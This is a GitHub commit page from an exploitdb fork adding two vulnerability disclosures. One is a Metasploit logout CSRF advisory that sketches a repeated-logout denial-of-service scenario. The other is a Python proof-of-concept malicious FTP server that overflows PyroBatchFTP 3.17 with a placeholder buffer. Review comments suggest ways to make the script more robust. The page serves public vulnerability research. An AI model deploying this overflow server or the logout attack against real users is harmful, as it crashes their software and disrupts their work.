forked from offensive-security/exploitdb
2 new exploits PyroBatchFTP 3.17 - Buffer Overflow (SEH) Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery
Offensive Security committed Oct 9, 2017 (1 parent: 4e334a2; commit 99ad37a)
Showing 3 changed files with 66 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,28 @@ | ||
# Exploit Title: CSRF | ||
# Date: Wed, Aug 30, 2017 | ||
# Software Link: https://www.metasploit.com/ | ||
# Exploit Author: Dhiraj Mishra | ||
# Contact: http://twitter.com/mishradhiraj_ | ||
# Website: http://datarift.blogspot.in/ | ||
# CVE: CVE-2017-15084 (R7-2017-22) | ||
# Category: Metasploit Pro, Express, Ultimate, and Community | ||
|
||
|
||
1. Description | ||
|
||
Metasploit Pro, Express, Ultimate, and Community can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser. | ||
|
||
2. Proof of concept | ||
|
||
The MSF did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://Metasploit-Server-IP:3790/logout | ||
Here's an attack vector: | ||
|
||
1) Set up a honeypot that detects MSF scans/attacks (somehow). | ||
2) Once I get a probe, fire back a logout request. | ||
3) Continue to logout the active user forever. | ||
|
||
It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS. This attack may have been useful as a denial of service against Metasploit instances, allowing an attacker to prevent normal Metasploit usage. | ||
|
||
3. Rapid7 Security Bulletin | ||
|
||
https://blog.rapid7.com/2017/10/06/vulnerabilities-affecting-four-rapid7-products-fixed/ |
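Review bot: the advisory never states which versions are affected or fixed: the `# Category:` header line lists the four product editions rather than an exploit category, and the only version information (fixed in 4.14.1-20170828) appears in the commit message, not in the file. Suggest adding a `# Version:` line with the affected range and naming the fixed build next to the bulletin link in section 3. Section 2 would also read better if it said plainly what the defect is and what the fix does: the logout endpoint is reachable with a plain GET to `/logout` and accepts it without a CSRF token, so the remediation is to bind the logout form to a per-session token (and ideally a POST), which is exactly what makes the "honeypot fires back a logout" scenario stop working.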
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
#!/usr/bin/python | ||
|
||
print "PyroBatchFTP Local Buffer Overflow (SEH) Server" | ||
|
||
#Author: Kevin McGuigan @_h3xagram | ||
#Author Website: https://www.7elements.co.uk | ||
#Vendor Website: https://www.emtech.com | ||
#Date: 07/10/2017 | ||
#Version: 3.17 | ||
#Tested on: Windows 7 32-bit | ||
#CVE: CVE-2017-15035 | ||
|
||
|
||
import socket | ||
import sys | ||
|
||
buffer="A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800 | ||
port = 21 | ||
|
||
try: | ||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
s.bind(("0.0.0.0", port)) | ||
s.listen(5) | ||
print("[+] FTP server started on port: "+str(port)+"\r\n") | ||
except: | ||
print("[+] Failed to bind the server to port: "+str(port)+"\r\n") | ||
|
||
while True: | ||
conn, addr = s.accept() | ||
conn.send('220 Welcome to PyoBatchFTP Overflow!\r\n') | ||
print(conn.recv(1024)) | ||
conn.send("331 OK\r\n") | ||
print(conn.recv(1024)) | ||
conn.send('230 OK\r\n') | ||
print(conn.recv(1024)) | ||
conn.send('220 "'+buffer+'" is current directory\r\n') |
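Review bot: the bind failure path does not stop the script: the bare `except:` prints a message and execution falls through into `while True:`, where `s.accept()` raises on an unlistening socket (or `s` is unbound if `socket.socket` itself failed). Suggest `sys.exit(1)` inside the handler, which also gives the otherwise unused `import sys` a purpose, and narrowing the clause to `except socket.error`. Two smaller points: the first `print "..."` is Python 2 statement syntax while every later print uses function syntax, so the file only runs under Python 2 despite looking mixed; and the banner misspells the product as `PyoBatchFTP`. The final reply also uses code 220 for what is a PWD response (normally 257); if the client accepts that, a comment saying so would save the next reader from "fixing" it.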